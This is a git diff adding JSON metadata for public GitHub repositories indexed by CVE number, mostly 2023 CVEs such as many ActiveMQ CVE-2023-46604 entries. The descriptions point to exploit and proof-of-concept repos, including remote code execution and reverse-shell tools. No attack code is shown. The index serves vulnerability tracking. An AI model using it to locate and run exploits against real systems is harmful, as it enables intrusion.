"created_at": "2023-05-28T07:26:49Z", + "updated_at": "2024-01-16T14:37:50Z", + "pushed_at": "2024-01-16T14:40:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46304.json b/2023/CVE-2023-46304.json new file mode 100644 index 0000000000..fa0d160724 --- /dev/null +++ b/2023/CVE-2023-46304.json @@ -0,0 +1,33 @@ +[ + { + "id": 781611038, + "name": "CVE-2023-46304", + "full_name": "jselliott\/CVE-2023-46304", + "owner": { + "login": "jselliott", + "id": 13350778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13350778?v=4", + "html_url": "https:\/\/github.com\/jselliott", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jselliott\/CVE-2023-46304", + "description": "Authenticated Remote Code Execution in in VTiger Open Source CRM v7.5", + "fork": false, + "created_at": "2024-04-03T17:57:23Z", + "updated_at": "2024-08-01T11:27:40Z", + "pushed_at": "2024-04-03T19:00:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4631.json b/2023/CVE-2023-4631.json new file mode 100644 index 0000000000..94ff0e77be --- /dev/null +++ b/2023/CVE-2023-4631.json @@ -0,0 +1,33 @@ +[ + { + "id": 695793018, + "name": "CVE-2023-4631", + "full_name": "b0marek\/CVE-2023-4631", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4631", + "description": "Repository for CVE-2023-4631 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:38:58Z", + "updated_at": "2023-09-24T08:38:59Z", + "pushed_at": "2023-09-24T08:44:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4634.json b/2023/CVE-2023-4634.json new file mode 100644 index 0000000000..4d8e2aee34 --- /dev/null +++ b/2023/CVE-2023-4634.json @@ -0,0 +1,33 @@ +[ + { + "id": 687359738, + "name": "CVE-2023-4634", + "full_name": "Patrowl\/CVE-2023-4634", + "owner": { + "login": "Patrowl", + "id": 28858120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28858120?v=4", + "html_url": "https:\/\/github.com\/Patrowl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Patrowl\/CVE-2023-4634", + "description": "CVE-2023-4634", + "fork": false, + "created_at": "2023-09-05T07:44:15Z", + "updated_at": "2024-11-25T06:12:49Z", + "pushed_at": "2023-09-07T05:36:10Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 46, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46344.json b/2023/CVE-2023-46344.json new file mode 100644 index 0000000000..1a3ecd6520 --- /dev/null +++ b/2023/CVE-2023-46344.json @@ -0,0 +1,33 @@ +[ + { + "id": 736803632, + "name": "CVE-2023-46344", + "full_name": "vinnie1717\/CVE-2023-46344", + "owner": { + "login": "vinnie1717", + "id": 28691535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28691535?v=4", + "html_url": "https:\/\/github.com\/vinnie1717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vinnie1717\/CVE-2023-46344", + "description": null, + "fork": false, + "created_at": "2023-12-28T23:29:53Z", + "updated_at": "2023-12-28T23:29:53Z", + "pushed_at": "2023-12-28T23:33:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4636.json b/2023/CVE-2023-4636.json new file mode 100644 index 0000000000..eaf429dda0 --- /dev/null +++ b/2023/CVE-2023-4636.json @@ -0,0 +1,33 @@ +[ + { + "id": 731273709, + "name": "CVE-2023-4636", + "full_name": "ThatNotEasy\/CVE-2023-4636", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-4636", + "description": "Unauthenticated Remote Code Execution with default Imagick", + "fork": false, + "created_at": "2023-12-13T17:59:02Z", + "updated_at": "2023-12-13T18:06:18Z", + "pushed_at": "2023-12-13T18:06:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46371.json b/2023/CVE-2023-46371.json new file mode 100644 index 0000000000..36704982e6 --- /dev/null +++ b/2023/CVE-2023-46371.json @@ -0,0 +1,33 @@ +[ + { + "id": 855189701, + "name": "CVE-poc-update", + "full_name": "Jianchun-Ding\/CVE-poc-update", + "owner": { + "login": "Jianchun-Ding", + "id": 110085007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110085007?v=4", + "html_url": "https:\/\/github.com\/Jianchun-Ding", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jianchun-Ding\/CVE-poc-update", + "description": "CVE-2023-46371 and CVE-2023-46527 update", + "fork": false, + "created_at": "2024-09-10T13:18:02Z", + "updated_at": "2024-10-17T14:48:10Z", + "pushed_at": "2024-10-17T14:48:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46404.json b/2023/CVE-2023-46404.json new file mode 100644 index 0000000000..99435bd4ba --- /dev/null +++ b/2023/CVE-2023-46404.json @@ -0,0 +1,33 @@ +[ + { + "id": 710370837, + "name": "CVE-2023-46404", + "full_name": "windecks\/CVE-2023-46404", + "owner": { + "login": "windecks", + "id": 55925786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55925786?v=4", + "html_url": "https:\/\/github.com\/windecks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windecks\/CVE-2023-46404", + "description": "PoC and Writeup for CVE-2023-46404.", + "fork": false, + "created_at": "2023-10-26T15:01:32Z", + "updated_at": "2023-11-13T18:42:18Z", + "pushed_at": "2023-10-28T17:53:06Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46442.json b/2023/CVE-2023-46442.json new file mode 100644 index 0000000000..5154170105 --- /dev/null +++ b/2023/CVE-2023-46442.json @@ -0,0 +1,33 @@ +[ + { + "id": 805310377, + "name": "CVE-2023-46442_POC", + "full_name": "JAckLosingHeart\/CVE-2023-46442_POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2023-46442_POC", + "description": "POC for CVE-2023-46442 Denial of Service vulnerability found within Soot", + "fork": false, + "created_at": "2024-05-24T10:03:38Z", + "updated_at": "2024-11-07T05:07:25Z", + "pushed_at": "2024-05-24T12:04:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46447.json b/2023/CVE-2023-46447.json new file mode 100644 index 0000000000..61c3957158 --- /dev/null +++ b/2023/CVE-2023-46447.json @@ -0,0 +1,35 @@ +[ + { + "id": 625225802, + "name": "rebel", + "full_name": "actuator\/rebel", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/rebel", + "description": "CVE-2023-46447 | VU#672804 ", + "fork": false, + "created_at": "2023-04-08T13:03:58Z", + "updated_at": "2024-01-19T12:28:09Z", + "pushed_at": "2023-10-01T12:53:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46447" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46449.json b/2023/CVE-2023-46449.json new file mode 100644 index 0000000000..4451fa5b49 --- /dev/null +++ b/2023/CVE-2023-46449.json @@ -0,0 +1,33 @@ +[ + { + "id": 710291166, + "name": "CVE-2023-46449", + "full_name": "sajaljat\/CVE-2023-46449", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46449", + "description": null, + "fork": false, + "created_at": "2023-10-26T12:03:29Z", + "updated_at": "2023-10-26T12:03:30Z", + "pushed_at": "2023-10-26T20:59:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46450.json b/2023/CVE-2023-46450.json new file mode 100644 index 0000000000..dcf3314324 --- /dev/null +++ b/2023/CVE-2023-46450.json @@ -0,0 +1,33 @@ +[ + { + "id": 710302205, + "name": "-CVE-2023-46450", + "full_name": "yte121\/-CVE-2023-46450", + "owner": { + "login": "yte121", + "id": 55489792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55489792?v=4", + "html_url": "https:\/\/github.com\/yte121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yte121\/-CVE-2023-46450", + "description": " CVE-2023-46450 reference", + "fork": false, + "created_at": "2023-10-26T12:30:21Z", + "updated_at": "2023-10-26T12:30:21Z", + "pushed_at": "2023-10-26T20:59:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46451.json b/2023/CVE-2023-46451.json new file mode 100644 index 0000000000..1e53518774 --- /dev/null +++ b/2023/CVE-2023-46451.json @@ -0,0 +1,33 @@ +[ + { + "id": 710303698, + "name": "CVE-2023-46451", + "full_name": "sajaljat\/CVE-2023-46451", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46451", + "description": null, + "fork": false, + "created_at": "2023-10-26T12:34:03Z", + "updated_at": "2023-10-26T12:34:03Z", + "pushed_at": "2023-10-26T21:01:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46454.json b/2023/CVE-2023-46454.json new file mode 100644 index 0000000000..3772cbcde8 --- /dev/null +++ b/2023/CVE-2023-46454.json @@ -0,0 +1,33 @@ +[ + { + "id": 728920376, + "name": "GL.iNet-Multiple-Vulnerabilities", + "full_name": "cyberaz0r\/GL.iNet-Multiple-Vulnerabilities", + "owner": { + "login": "cyberaz0r", + "id": 35109470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35109470?v=4", + "html_url": "https:\/\/github.com\/cyberaz0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberaz0r\/GL.iNet-Multiple-Vulnerabilities", + "description": "Exploits for GL.iNet CVE-2023-46454, CVE-2023-46455 and CVE-2023-46456", + "fork": false, + "created_at": "2023-12-08T01:45:16Z", + "updated_at": "2024-02-15T02:08:56Z", + "pushed_at": "2023-12-08T04:35:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46474.json b/2023/CVE-2023-46474.json new file mode 100644 index 0000000000..e7268a38e6 --- /dev/null +++ b/2023/CVE-2023-46474.json @@ -0,0 +1,33 @@ +[ + { + "id": 741848730, + "name": "CVE-2023-46474", + "full_name": "Xn2\/CVE-2023-46474", + "owner": { + "login": "Xn2", + "id": 19215931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19215931?v=4", + "html_url": "https:\/\/github.com\/Xn2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xn2\/CVE-2023-46474", + "description": "Technical details for CVE-2023-46474", + "fork": false, + "created_at": "2024-01-11T08:35:18Z", + "updated_at": "2024-01-12T17:13:16Z", + "pushed_at": "2024-01-11T08:40:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46478.json b/2023/CVE-2023-46478.json new file mode 100644 index 0000000000..8023b4ae6e --- /dev/null +++ b/2023/CVE-2023-46478.json @@ -0,0 +1,33 @@ +[ + { + "id": 711887805, + "name": "CVE-2023-46478", + "full_name": "mr-xmen786\/CVE-2023-46478", + "owner": { + "login": "mr-xmen786", + "id": 79393031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79393031?v=4", + "html_url": "https:\/\/github.com\/mr-xmen786", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-xmen786\/CVE-2023-46478", + "description": null, + "fork": false, + "created_at": "2023-10-30T11:28:43Z", + "updated_at": "2023-10-30T11:28:44Z", + "pushed_at": "2023-10-30T14:01:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46501.json b/2023/CVE-2023-46501.json new file mode 100644 index 0000000000..3bef8fad29 --- /dev/null +++ b/2023/CVE-2023-46501.json @@ -0,0 +1,33 @@ +[ + { + "id": 712418367, + "name": "CVE-2023-46501", + "full_name": "Cyber-Wo0dy\/CVE-2023-46501", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-46501", + "description": "BoltWire v6.03 vulnerable to \"Improper Access Control\"", + "fork": false, + "created_at": "2023-10-31T12:40:14Z", + "updated_at": "2024-08-11T14:46:00Z", + "pushed_at": "2023-10-31T12:41:20Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46604.json b/2023/CVE-2023-46604.json new file mode 100644 index 0000000000..44ea2df218 --- /dev/null +++ b/2023/CVE-2023-46604.json @@ -0,0 +1,844 @@ +[ + { + "id": 710110251, + "name": "ActiveMQ-RCE", + "full_name": "trganda\/ActiveMQ-RCE", + "owner": { + "login": "trganda", + "id": 62204882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4", + "html_url": "https:\/\/github.com\/trganda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trganda\/ActiveMQ-RCE", + "description": "CVE-2023-46604", + "fork": false, + "created_at": "2023-10-26T03:25:05Z", + "updated_at": "2024-05-16T02:37:15Z", + "pushed_at": "2023-10-26T03:28:14Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710638824, + "name": "ActiveMQ-RCE", + "full_name": "X1r0z\/ActiveMQ-RCE", + "owner": { + "login": "X1r0z", + "id": 28532286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28532286?v=4", + "html_url": "https:\/\/github.com\/X1r0z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X1r0z\/ActiveMQ-RCE", + "description": "ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具", + "fork": false, + "created_at": "2023-10-27T05:57:21Z", + "updated_at": "2024-11-22T02:45:38Z", + "pushed_at": "2024-01-29T02:28:11Z", + "stargazers_count": 226, + "watchers_count": 226, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 226, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 710778413, + "name": "ActiveMQ_RCE_Pro_Max", + "full_name": "JaneMandy\/ActiveMQ_RCE_Pro_Max", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/ActiveMQ_RCE_Pro_Max", + "description": "CVE-2023-46604", + "fork": false, + "created_at": "2023-10-27T12:22:43Z", + "updated_at": "2024-11-09T17:57:37Z", + "pushed_at": "2023-11-03T14:14:31Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 62, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 714084454, + "name": "CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ", + "full_name": "SaumyajeetDas\/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ", + "owner": { + "login": "SaumyajeetDas", + "id": 66937297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66937297?v=4", + "html_url": "https:\/\/github.com\/SaumyajeetDas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SaumyajeetDas\/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ", + "description": " Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604) ", + "fork": false, + "created_at": "2023-11-03T22:06:09Z", + "updated_at": "2024-11-27T13:34:39Z", + "pushed_at": "2024-01-20T16:59:23Z", + "stargazers_count": 109, + "watchers_count": 109, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 109, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 714263844, + "name": "CVE-2023-46604", + "full_name": "evkl1d\/CVE-2023-46604", + "owner": { + "login": "evkl1d", + "id": 113887123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113887123?v=4", + "html_url": "https:\/\/github.com\/evkl1d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evkl1d\/CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2023-11-04T11:58:21Z", + "updated_at": "2024-11-21T12:27:37Z", + "pushed_at": "2023-11-06T07:26:30Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714895258, + "name": "CVE-2023-46604", + "full_name": "sule01u\/CVE-2023-46604", + "owner": { + "login": "sule01u", + "id": 33783361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33783361?v=4", + "html_url": "https:\/\/github.com\/sule01u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sule01u\/CVE-2023-46604", + "description": " CVE-2023-46604 ActiveMQ RCE vulnerability verification\/exploitation tool", + "fork": false, + "created_at": "2023-11-06T04:05:51Z", + "updated_at": "2024-05-14T03:14:48Z", + "pushed_at": "2023-11-12T10:40:14Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46604" + ], + "visibility": "public", + "forks": 6, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 715968405, + "name": "CVE-2023-46604-Apache-ActiveMQ-RCE-exp", + "full_name": "justdoit-cai\/CVE-2023-46604-Apache-ActiveMQ-RCE-exp", + "owner": { + "login": "justdoit-cai", + "id": 126458073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126458073?v=4", + "html_url": "https:\/\/github.com\/justdoit-cai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justdoit-cai\/CVE-2023-46604-Apache-ActiveMQ-RCE-exp", + "description": "CVE-2023-46604 Apache ActiveMQ RCE exp 基于python", + "fork": false, + "created_at": "2023-11-08T07:48:00Z", + "updated_at": "2023-12-06T06:14:14Z", + "pushed_at": "2023-11-08T07:52:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716551880, + "name": "ActiveMQ-RCE-CVE-2023-46604-Write-up", + "full_name": "h3x3h0g\/ActiveMQ-RCE-CVE-2023-46604-Write-up", + "owner": { + "login": "h3x3h0g", + "id": 128398565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128398565?v=4", + "html_url": "https:\/\/github.com\/h3x3h0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3x3h0g\/ActiveMQ-RCE-CVE-2023-46604-Write-up", + "description": null, + "fork": false, + "created_at": "2023-11-09T11:27:20Z", + "updated_at": "2023-11-15T10:22:43Z", + "pushed_at": "2023-11-09T11:36:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 717720175, + "name": "CVE-2023-46604-ActiveMQ-RCE-pseudoshell", + "full_name": "duck-sec\/CVE-2023-46604-ActiveMQ-RCE-pseudoshell", + "owner": { + "login": "duck-sec", + "id": 129839654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4", + "html_url": "https:\/\/github.com\/duck-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-46604-ActiveMQ-RCE-pseudoshell", + "description": "This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.", + "fork": false, + "created_at": "2023-11-12T11:26:46Z", + "updated_at": "2024-11-22T09:36:49Z", + "pushed_at": "2024-01-24T13:44:29Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 719245638, + "name": "CVE-2023-46604-POC", + "full_name": "vjayant93\/CVE-2023-46604-POC", + "owner": { + "login": "vjayant93", + "id": 47580148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47580148?v=4", + "html_url": "https:\/\/github.com\/vjayant93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vjayant93\/CVE-2023-46604-POC", + "description": "POC repo for CVE-2023-46604", + "fork": false, + "created_at": "2023-11-15T19:11:01Z", + "updated_at": "2023-11-15T19:11:02Z", + "pushed_at": "2023-11-16T21:21:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719369149, + "name": "CVE-2023-46604_ActiveMQ_RCE_Recurrence", + "full_name": "LiritoShawshark\/CVE-2023-46604_ActiveMQ_RCE_Recurrence", + "owner": { + "login": "LiritoShawshark", + "id": 56113617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56113617?v=4", + "html_url": "https:\/\/github.com\/LiritoShawshark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LiritoShawshark\/CVE-2023-46604_ActiveMQ_RCE_Recurrence", + "description": "CVE-2023-46604环境复现包", + "fork": false, + "created_at": "2023-11-16T02:36:07Z", + "updated_at": "2024-01-24T04:49:52Z", + "pushed_at": "2023-11-16T02:37:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720423496, + "name": "CVE-2023-46604-RCE", + "full_name": "NKeshawarz\/CVE-2023-46604-RCE", + "owner": { + "login": "NKeshawarz", + "id": 151177833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151177833?v=4", + "html_url": "https:\/\/github.com\/NKeshawarz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NKeshawarz\/CVE-2023-46604-RCE", + "description": null, + "fork": false, + "created_at": "2023-11-18T12:51:03Z", + "updated_at": "2023-12-07T21:36:30Z", + "pushed_at": "2023-11-18T13:18:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720937725, + "name": "ActiveMQ_CVE-2023-46604", + "full_name": "minhangxiaohui\/ActiveMQ_CVE-2023-46604", + "owner": { + "login": "minhangxiaohui", + "id": 39674723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39674723?v=4", + "html_url": "https:\/\/github.com\/minhangxiaohui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minhangxiaohui\/ActiveMQ_CVE-2023-46604", + "description": "PY", + "fork": false, + "created_at": "2023-11-20T02:24:47Z", + "updated_at": "2023-11-21T01:50:16Z", + "pushed_at": "2023-11-20T07:41:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721121106, + "name": "CVE-2023-46604-demo", + "full_name": "nitzanoligo\/CVE-2023-46604-demo", + "owner": { + "login": "nitzanoligo", + "id": 100521249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100521249?v=4", + "html_url": "https:\/\/github.com\/nitzanoligo", + "user_view_type": 